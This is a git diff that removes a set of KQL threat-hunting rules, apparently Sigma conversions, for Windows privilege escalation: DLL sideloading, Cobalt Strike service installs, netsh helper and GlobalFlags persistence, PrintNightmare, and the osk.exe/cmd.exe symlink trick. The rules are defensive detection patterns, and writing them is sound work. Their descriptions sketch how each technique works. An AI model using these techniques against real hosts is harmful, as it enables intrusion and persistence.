-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql b/Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql
deleted file mode 100644
index 000b03f0..00000000
--- a/Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\log.dll" and (not(((FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\")))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend 
Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql b/Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql
deleted file mode 100644
index 49da9307..00000000
--- a/Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Den Iuzvyk
-// Date: 2020/07/15
-// Level: low
-// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.
-An attacker can use this to authenticate to Azure AD in a browser as that user.
-
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith 
"\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql b/Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql
deleted file mode 100644
index 1c5d0f3d..00000000
--- a/Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerDU.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql b/Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql
deleted file mode 100644
index 7d335d90..00000000
--- a/Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql b/Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql
deleted file mode 100644
index 4ca5d408..00000000
--- a/Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql b/Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql
deleted file mode 100644
index e448ad48..00000000
--- a/Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Wojciech Lesicki
-// Date: 2021/06/29
-// Level: high
-// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
-
-// Tags: attack.execution, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1543.003, attack.t1569.002
-DeviceRegistryEvents
-| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql b/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql
deleted file mode 100644
index 7d53df8f..00000000
--- a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbgcore.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql b/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql
deleted file mode 100644
index 85e52e34..00000000
--- a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbghelp.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql b/Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql
deleted file mode 100644
index bafb67b9..00000000
--- a/Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql b/Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql
deleted file mode 100644
index d6f4a3c3..00000000
--- a/Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/13
-// Level: medium
-// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql b/Privilege Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql
deleted file mode 100644
index 4d8a43ae..00000000
--- a/Privilege Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/14
-// Level: medium
-// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql b/Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql
deleted file mode 100644
index 05e33118..00000000
--- a/Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\")
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_EACore.DLL_Sideloading.kql b/Privilege Escalation/Potential_EACore.DLL_Sideloading.kql
deleted file mode 100644
index f843422e..00000000
--- a/Privilege Escalation/Potential_EACore.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: high
-// Description: Detects potential DLL sideloading of "EACore.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql b/Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql
deleted file mode 100644
index fa643858..00000000
--- a/Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: high
-// Description: Detects potential DLL sideloading of "edputil.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql b/Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql
deleted file mode 100644
index 27f1e8dc..00000000
--- a/Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: medium
-// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not(((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql b/Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql
deleted file mode 100644
index 3d46efa4..00000000
--- a/Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/21
-// Level: high
-// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql b/Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql
deleted file mode 100644
index 3fce189b..00000000
--- a/Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql b/Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql
deleted file mode 100644
index 163f4b42..00000000
--- a/Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql b/Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql
deleted file mode 100644
index 0af11ee9..00000000
--- a/Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Karneades, Jonhnathan Ribeiro, Florian Roth
-// Date: 2018/04/11
-// Level: high
-// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
-// Tags: attack.privilege_escalation, attack.persistence, attack.defense_evasion, attack.t1546.012, car.2013-01-002
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\Image File Execution Options" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\SilentProcessExit"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql b/Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql
deleted file mode 100644
index 5512073b..00000000
--- a/Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
-
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.007, attack.s0108
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql b/Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql
deleted file mode 100644
index 7040127d..00000000
--- a/Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2021/07/01
-// Level: high
-// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\"
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql b/Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
deleted file mode 100644
index 1a2be179..00000000
--- a/Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local")
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql b/Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql
deleted file mode 100644
index c40a0f11..00000000
--- a/Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/11
-// Level: high
-// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql b/Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql
deleted file mode 100644
index e10e42a6..00000000
--- a/Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov
-// Date: 2019/10/26
-// Level: high
-// Description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level
-// Tags: attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\ImagePath" or ProcessCommandLine contains "\\FailureCommand" or ProcessCommandLine contains "\\ServiceDll") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "services") and ProcessIntegrityLevel =~ "Medium"
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql b/Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql
deleted file mode 100644
index dc23a7d8..00000000
--- a/Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: high
-// Description: Detects potential DLL sideloading of rcdll.dll
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql b/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql
deleted file mode 100644
index fef361b2..00000000
--- a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: medium
-// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll"
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql b/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql
deleted file mode 100644
index 172b3879..00000000
--- a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: high
-// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql b/Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql
deleted file mode 100644
index bd581c2f..00000000
--- a/Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/14
-// Level: medium
-// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\"))))
